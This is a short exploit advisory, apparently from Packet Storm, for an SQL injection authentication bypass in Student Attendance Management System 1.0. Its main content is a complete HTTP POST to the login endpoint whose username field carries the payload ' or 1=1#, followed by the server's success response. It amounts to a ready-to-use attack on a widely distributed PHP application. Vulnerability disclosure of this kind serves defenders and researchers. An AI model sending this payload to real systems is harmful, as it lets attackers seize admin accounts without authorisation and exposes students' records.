Share
## https://sploitus.com/exploit?id=PACKETSTORM:179190
## Titles: Student Attendance Management System-1.0 Bypass Authentication  
SQLi  
## Author: nu11secur1ty  
## Date: 06/22/2024  
## Vendor: https://github.com/oretnom23  
## Software:  
https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The username parameter is not sanitizing well, the attacker can inject  
direct queries into the login form and easily bypass the authentication of  
the admin account.  
  
STATUS: CRITICAL- Vulnerability  
  
  
[+]Exploits:  
- Exploit:  
```POST  
POST /student_attendance/ajax.php?action=login HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4  
Content-Length: 104  
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"  
Accept-Language: en-US  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://pwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://pwnedhost.com/student_attendance/login.php  
Accept-Encoding: gzip, deflate, br  
Priority: u=1, i  
Connection: keep-alive  
  
username=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid  
```  
  
[+]Response  
```HTTP  
HTTP/1.1 200 OK  
Date: Sat, 22 Jun 2024 06:37:41 GMT  
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4  
X-Powered-By: PHP/8.2.4  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html; charset=UTF-8  
  
1  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/student-system-1-106665723)  
  
## Proof and Exploit:  
[href](https://www.patreon.com/posts/student-system-1-106665723)  
  
## Time spent:  
01:25:00